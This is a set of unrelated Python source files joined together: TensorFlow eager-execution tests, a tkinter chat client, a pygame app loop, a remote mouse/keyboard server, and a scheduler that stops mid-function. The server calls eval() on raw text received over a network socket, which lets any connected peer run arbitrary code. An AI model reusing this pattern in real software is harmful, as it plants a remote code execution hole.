def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
@test_util.run_gpu_only
def testInt32GPU(self):
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(),
ctx.scope_name,
ctx.summary_writer,
ctx.summary_recording,
ctx.summary_step,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
@test_util.run_gpu_only
def testContextConfig(self):
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEquals(0, ctx.num_gpus())
def testPickle(self):
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, 't.pickle')
with open(fname, 'wb') as f:
t = constant_op.constant(10.0)
pickle.dump(t, f)
with open(fname, 'rb') as f:
t = pickle.load(f)
self.assertAllEqual(t.numpy(), 10.0)
@test_util.run_gpu_only
def testDevicePlacementEnforcesConsistency(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
cpu.__enter__()
self.assertEndsWith(current_device(), 'CPU:0')
gpu.__enter__()
self.assertEndsWith(current_device(), 'GPU:0')
with self.assertRaisesRegexp(
RuntimeError, 'Exiting device scope without proper scope nesting'):
cpu.__exit__()
self.assertEndsWith(current_device(), 'GPU:0')
gpu.__exit__()
self.assertEndsWith(current_device(), 'CPU:0')
@test_util.run_gpu_only
def testReEntrant(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
with cpu:
with gpu:
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'CPU:0')
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
@test_util.run_gpu_only
def testTensorPlacement(self):
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
@test_util.run_gpu_only
def testResourceTensorPlacement(self):
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
# Check that even though we specified the cpu device we'll run the read op
# in the device where the handle is.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
@test_util.run_gpu_only
def testCopyBetweenDevices(self):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
@test_util.run_gpu_only
def testCopyBetweenDevicesAsync(self):
with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.async_wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.async_wait()
context.async_clear_error()
@test_util.run_gpu_only
def testCopyScope(self):
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
def testPyFunctionNullContext(self):
def simple_fn(unused_handle):
return 1.
@def_function.function
def test_fn(v):
script_ops.eager_py_func(simple_fn, [v.handle], dtypes.float32)
return 1.
test_var = variables.Variable([2., 3.])
self.assertAllEqual(test_fn(test_var), 1.0)
def testPyFunctionAsync(self):
def simple_fn(v):
one = constant_op.constant(1.)
return v + one
@def_function.function
def test_fn(v):
return script_ops.eager_py_func(simple_fn, [v], dtypes.float32)
async_executor = executor.Executor(enable_async=True)
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
self.assertAllEqual(test_fn(test_var), 3.0)
async_executor.wait()
@test_util.run_gpu_only
def testNumpyForceCPU(self):
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(str)
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
context.set_execution_mode(context.ASYNC)
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))
context.async_wait()
context.async_clear_error()
context.context().execution_mode = context.SYNC
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
@test_util.run_gpu_only
def testMatMulGPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3]]),
constant_op.constant([[5]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', 1, 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEquals(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
@test_util.run_gpu_only
def testOperationWithNoInputsRunsOnDevice(self):
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
self.assertEquals(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
def testConvertMixedEagerTensorsWithVariables(self):
var = resource_variable_ops.ResourceVariable(1.0)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
['foo', var], context.context())
self.assertAllEqual([dtypes.string, dtypes.float32], types)
for t in tensors:
self.assertIsInstance(t, ops.EagerTensor)
# TODO(b/123637108): re-enable
@test_util.run_gpu_only
def disabled_testSmallIntegerOpsForcedToCPU(self):
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.int64)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op forced to CPU since all constants are integers and small.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:CPU:0')
a = array_ops.zeros((8, 10), dtype=dtypes.int64)
b = array_ops.ones((8, 10), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the tensors are larger than 64 elements.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:GPU:0')
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.float32)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.float32)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the constants are not integers.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:GPU:0')
def testExecutionModeIsStoredThreadLocal(self):
cv = threading.Condition()
count = [0]
num_threads = 10
def execution_mode_test(cond, count, num_threads, ctx, mode):
cond.acquire()
# Ensure that all threads set their mode simultaneously
# Note that this is not a simple assignment, as the execution_mode is an
# @property with a custom setter.
ctx.execution_mode = mode
count[0] = count[0] + 1
if count[0] < num_threads:
cond.wait()
else:
cond.notify_all()
cond.release()
self.assertEqual(ctx.execution_mode, mode)
ctx = context.Context()
threads = []
for i in range(num_threads):
t = threading.Thread(
target=execution_mode_test,
args=(cv, count, num_threads, ctx,
context.SYNC if i % 2 == 0 else context.ASYNC))
t.start()
threads.append(t)
for t in threads:
t.join()
class SendRecvTest(test_util.TensorFlowTestCase):
cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
def setUp(self):
super(SendRecvTest, self).setUp()
configure_virtual_cpus()
def testBasic(self):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
@test_util.run_gpu_only
def testLocalCrossDevice(self):
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = constant_op.constant(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
class EagerTensorCacheTest(test_util.TensorFlowTestCase):
def setUp(self):
super(EagerTensorCacheTest, self).setUp()
configure_virtual_cpus()
def testCacheSkipsTensorsTooLarge(self):
cache = context._EagerTensorCache(max_items=100, max_tensor_size=3)
cache.put('1', array_ops.zeros((2, 2)))
self.assertIsNone(cache.get('1'))
cache.put('2', array_ops.zeros((2)))
self.assertIsNotNone(cache.get('2'))
if __name__ == '__main__':
test.main()
|
client.py
|
import socket
import threading
import tkinter
import tkinter.scrolledtext
from tkinter import simpledialog
HOST = '127.0.0.1'
PORT = 9090
class Client:
def __init__(self, host, port):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((host, port))
msg = tkinter.Tk()
msg.withdraw()
self.nickname = simpledialog.askstring("Nickname", "Please choose a nickname", parent=msg)
self.gui_done = False
self.running = True
gui_thread = threading.Thread(target=self.gui_loop)
receive_thread = threading.Thread(target=self.receive)
gui_thread.start()
receive_thread.start()
def gui_loop(self):
self.win = tkinter.Tk()
self.win.configure(bg="lightblue")
self.chat_label = tkinter.Label(self.win, text="Chat:", bg="lightgray")
self.chat_label.config(font=("Arial", 12))
self.chat_label.pack(padx=20, pady=5)
self.text_area = tkinter.scrolledtext.ScrolledText(self.win)
self.text_area.pack(padx=20, pady=5)
self.text_area.config(state='disabled')
        self.msg_label = tkinter.Label(self.win, text="Message:", bg="lightgray")
self.msg_label.config(font=("Arial", 12))
self.msg_label.pack(padx=20, pady=5)
self.input_area = tkinter.Text(self.win, height=3)
self.input_area.pack(padx=20, pady=5)
        self.send_button = tkinter.Button(self.win, text="Send", command=self.write)
self.send_button.config(font=("Arial", 12))
self.send_button.pack(padx=20, pady=5)
self.gui_done = True
self.win.protocol("WM_DELETE_WINDOW",self.stop)
self.win.mainloop()
def write(self):
message = f"{self.nickname}: {self.input_area.get('1.0', 'end')}"
self.sock.send(message.encode('utf-8'))
self.input_area.delete('1.0', 'end')
def stop(self):
self.running = False
self.win.destroy()
self.sock.close()
exit(0)
def receive(self):
while self.running:
try:
message = self.sock.recv(1024).decode('utf-8')
                # The server sends this token to request the client's nickname.
                if message == 'shubham':
self.sock.send(self.nickname.encode('utf-8'))
else:
if self.gui_done:
self.text_area.config(state='normal')
self.text_area.insert('end', message)
self.text_area.yview('end')
self.text_area.config(state='disabled')
except ConnectionAbortedError:
break
            except Exception:
                print("Error receiving message")
self.sock.close()
break
client = Client(HOST, PORT)
|
app.py
|
import pygame
import numpy as np
import time
import threading
from .utils.LockableData import LockableData
from .Engine import Engine
WIDTH, HEIGHT = 1000, 1000
class App:
def __init__(self, width, height, title, requested_tps, engine):
self.settings = LockableData(running=False, tick=0, frame_since_update=0)
self._requested_tps = requested_tps
self._title = title
self.engine = engine
pygame.init()
self.screen = pygame.display.set_mode((width, height))
def _render_thread(self):
render_count = 0
fps = None
t_last = time.time_ns()
while self.settings.get('running'):
if time.time_ns() - t_last > 1E9:
t_last = time.time_ns()
fps = render_count
title = f'{self._title} - at {fps} FPS, {self._requested_tps} TPS'
print(title)
pygame.display.set_caption(title)
render_count = 0
self.engine.render(self.screen)
self.settings.incr('frame_since_update')
render_count += 1
def _stop(self):
self.settings.set('running', False)
def _tick_thread(self):
tick_count = 0
clock = pygame.time.Clock()
while self.settings.get('running'):
if self.engine.tick(self._stop, pygame.event.get(), tick_count):
self.settings.set('frame_since_update', 0)
tick_count += 1
clock.tick(self._requested_tps)
def run(self):
self.settings.set('running', True)
render_thread = threading.Thread(target=self._render_thread)
tick_thread = threading.Thread(target=self._tick_thread)
        # Start threads and wait for them to stop
render_thread.start()
tick_thread.start()
render_thread.join()
tick_thread.join()
print('done')
pygame.quit()
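# Interface note (inferred from the calls above): `engine` is expected to expose
# render(screen) and tick(stop_fn, events, tick_count) -> bool (True when the state changed),
# and LockableData to expose get/set/incr for thread-safe access to the shared settings.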
if __name__ == "__main__":
e = Engine()
app = App(WIDTH, HEIGHT, 'Test Engine', 30, e)
app.run()
|
server.py
|
import socket
import mouse
import time
import re
from pynput.mouse import Button, Controller
from pynput.keyboard import Key
import pynput.keyboard
import tkinter
import sys
from tkinter import *
from functools import partial
import threading
m = Controller()
k = pynput.keyboard.Controller()
def start_server(ip, port):
HOST = ip
PORT = int(port)
currx = 0
curry = 0
#
def set_display_properties():
root = tkinter.Tk()
root.attributes('-alpha', 0)
root.attributes('-fullscreen', True)
return (root.winfo_screenwidth(), root.winfo_screenheight())
screen_dimensions = set_display_properties()
#
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as main_socket:
main_socket.bind((HOST, PORT))
main_socket.listen()
conn, addr = main_socket.accept()
with conn:
print('Connected by : ', addr)
server_screen = conn.recv(1024).decode('utf-8')
server_width = int(server_screen.split(':')[0])
server_height = int(server_screen.split(':')[1])
while True:
data = conn.recv(1024)
if not data: break
point = data.decode('utf-8')
try:
if point.split(')')[1] == '':
if point[:11] == 'ButtonEvent':
button_event = eval('mouse.' + point)
if button_event.event_type == 'up': m.release(button_event.button)
elif button_event.event_type == 'down': m.press(button_event.button)
else:
mouse.play([eval('mouse.' + point)])
except:
                    if point[:2] == 'kb':
                        # Keyboard events: point[2] is 'r' for release and (presumably) 'p' for press;
                        # point[3] is 'a' for plain characters, 's' for special-key expressions.
                        if point[3] == 'a':
                            if point[2] == 'r': k.release(point[5:])
                            if point[2] == 'p': k.press(point[5:])
                        elif point[3] == 's':
                            if point[2] == 'r': k.release(eval(point[5:]))
                            if point[2] == 'p': k.press(eval(point[5:]))
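# Protocol note (inferred from the handling above): the client first sends its screen size as
# "width:height", then streams mouse events as mouse.* event reprs and keyboard events as
# strings prefixed with "kb".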
def start_server_thread(ip, port):
main_server_thread = threading.Thread(target=start_server, args=(ip.get(), port.get()))
main_server_thread.start()
tk_window = Tk()
tk_window.geometry('200x150')
tk_window.title('Sinkron')
ip_label = Label(tk_window, text="IP Address").grid(row=0, column=0)
ip = StringVar()
ip_entry = Entry(tk_window, textvariable=ip).grid(row=0, column=1)
port_label = Label(tk_window, text="Port").grid(row=1, column=0)
port = StringVar()
port_entry = Entry(tk_window, textvariable=port).grid(row=1, column=1)
start_server_thread = partial(start_server_thread, ip, port)
start_server_button = Button(tk_window, text="Start Server", command=start_server_thread).grid(row=4, column=0)
tk_window.mainloop()
# -
|
_schedulers.py
|
import datetime
import multiprocessing
from collections import defaultdict
from linora.utils._config import Config
__all__ = ['Schedulers']
class Schedulers():
"""Time job task manager."""
def __init__(self, logger=None, verbose=0, config_file=None):
"""
Args:
logger: Logger object, linora.utils.Logger() class.
verbose: Verbosity mode, 0 (silent), 1 (verbose).
            config_file: job task config file; must be a .py file.
                example: a file named schedulers_config.py containing a dict such as
                config = {'hhh':{'mode':'every_minute', 'time':50, 'function':function, 'args':[], 'kwargs':{}}}
"""
self.config = dict()
self.params = Config()
self.params.verbose = verbose
if logger is None:
self.params.verbose = 0
self.params.logger = logger
self.params.config_file = config_file
manager = multiprocessing.Manager()
self.params.tracker_dict = manager.dict()
self.params.runner_dict = defaultdict()
def every_minute(self, time, function, args=None, kwargs=None, name=None):
"""Run task manager every minute.
Args:
            time: int or str in the range 0~59; 27 means the task will start at the 27th second of every minute.
function: task function.
args: list, function args.
kwargs: dict, function kwargs.
name: task name, if None, is function name.
"""
if args is None:
args = list()
if kwargs is None:
kwargs = dict()
if name is None:
name = function.__name__+(f'_{len(self.config)+1}' if function.__name__ in self.config else '')
self.config[name] = {'mode':'every_minute', 'time':int(time), 'function':function, 'args':args,
'kwargs':kwargs, 'execute_num':0, 'runner':(function, args, kwargs, name),
'time_init':datetime.datetime.now()}
self.params.tracker_dict[name] = dict()
def every_hour(self, time, function, args=None, kwargs=None, name=None):
"""Run task manager every hour.
Args:
            time: str, '30:27' means the task will start at the 30th minute and 27th second of every hour.
function: task function.
args: list, function args.
kwargs: dict, function kwargs.
name: task name, if None, is function name.
"""
if args is None:
args = list()
if kwargs is None:
kwargs = dict()
if name is None:
name = function.__name__+(f'_{len(self.config)+1}' if function.__name__ in self.config else '')
self.config[name] = {'mode':'every_hour', 'time':time, 'function':function, 'args':args,
'kwargs':kwargs, 'execute_num':0, 'runner':(function, args, kwargs, name),
'time_init':datetime.datetime.now()}
self.params.tracker_dict[name] = dict()
def every_day(self, time, function, args=None, kwargs=None, name=None):
"""Run task manager every day.
Args:
            time: str, '08:30:27' means the task will start at 08:30:27 every day.
function: task function.
args: list, function args.
kwargs: dict, function kwargs.
name: task name, if None, is function name.
"""
if args is None:
args = list()
if kwargs is None:
kwargs = dict()
if name is None:
name = function.__name__+(f'_{len(self.config)+1}' if function.__name__ in self.config else '')
self.config[name] = {'mode':'every_day', 'time':time, 'function':function, 'args':args,
'kwargs':kwargs, 'execute_num':0, 'runner':(function, args, kwargs, name),
'time_init':datetime.datetime.now()}
self.params.tracker_dict[name] = dict()
def every_week(self, time, function, args=None, kwargs=None, name=None):
"""Run task manager every week.
Args:
            time: str, '1,3,7:08:30:27' means the task will start at 08:30:27
                every Monday, Wednesday, and Sunday.
function: task function.
args: list, function args.
kwargs: dict, function kwargs.
name: task name, if None, is function name.
"""
if args is None:
args = list()
if kwargs is None:
kwargs = dict()
if name is None:
name = function.__name__+(f'_{len(self.config)+1}' if function.__name__ in self.config else '')
self.config[name] = {'mode':'every_week', 'time':time, 'function':function, 'args':args,
'kwargs':kwargs, 'execute_num':0, 'runner':(function, args, kwargs, name),
'time_init':datetime.datetime.now()}
self.params.tracker_dict[name] = dict()
def every_month(self, time, function, args=None, kwargs=None, name=None):
"""Run task manager every month.
Args:
            time: str, '1,13,27:08:30:27' means the task will start at 08:30:27
                on the 1st, 13th, and 27th of each month.
function: task function.
args: list, function args.
kwargs: dict, function kwargs.
name: task name, if None, is function name.
"""
if args is None:
args = list()
if kwargs is None:
kwargs = dict()
if name is None:
name = function.__name__+(f'_{len(self.config)+1}' if function.__name__ in self.config else '')
self.config[name] = {'mode':'every_month', 'time':time, 'function':function, 'args':args,
'kwargs':kwargs, 'execute_num':0, 'runner':(function, args, kwargs, name),
'time_init':datetime.datetime.now()}
self.params.tracker_dict[name] = dict()
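    # Illustrative usage (backup_db is a hypothetical task function):
    #   sched = Schedulers()
    #   sched.every_minute(30, backup_db)               # 30th second of every minute
    #   sched.every_day('08:30:27', backup_db)          # 08:30:27 every day
    #   sched.every_week('1,3,7:08:30:27', backup_db)   # Mon/Wed/Sun at 08:30:27
    #   sched.run()                                     # blocks and dispatches the tasks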
def _reset_time(self, name, time_now=None):
if time_now is None:
time_now = datetime.datetime.now()
if self.config[name]['mode']=='every_minute':
seconds = 60+self.config[name]['time']-time_now.second
elif self.config[name]['mode']=='every_hour':
split = self.config[name]['time'].split(':')
seconds = int(datetime.datetime(time_now.year, time_now.month, time_now.day, time_now.hour,
int(split[0]), int(split[1]), time_now.microsecond
).timestamp()-time_now.timestamp())
if seconds<40:
seconds = 3600+seconds
elif self.config[name]['mode']=='every_day':
split = self.config[name]['time'].split(':')
seconds = int(datetime.datetime(time_now.year, time_now.month, time_now.day, int(split[0]),
int(split[1]), int(split[2]), time_now.microsecond
).timestamp()-time_now.timestamp())
if seconds<40:
seconds = 86400+seconds
elif self.config[name]['mode']=='every_week':
split = self.config[name]['time'].split(':')
